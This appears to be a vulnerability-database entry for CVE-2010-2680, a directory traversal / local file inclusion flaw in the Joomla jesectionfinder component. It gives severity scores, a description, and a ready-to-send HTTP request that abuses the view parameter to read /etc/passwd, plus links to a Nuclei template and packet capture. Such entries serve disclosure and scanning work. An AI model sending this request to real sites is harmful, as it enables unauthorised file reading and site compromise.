| Title | Joomla! Component jesectionfinder - Local File Inclusion |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | Remote attackers can include and execute arbitrary local files, potentially leading to remote code execution or full site compromise. |
| Remediation | Apply the latest security patches or update to the latest version of the component. |
| CVSS Score | 6.8 |
| EPSS Score | 0.0202 |
| CVE ID | CVE-2010-2680 |
| CWE ID | CWE-22 |
| Tags | cve2010 cve joomla lfi edb packetstorm harmistechnology vuln |
A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.
GET /propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:140.0.) Gecko/20100101 Firefox/140.0.
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-2680.yaml
🦈 Packet Capture: ⬇️ Download cve-2010-2680.pcap
N/AN/A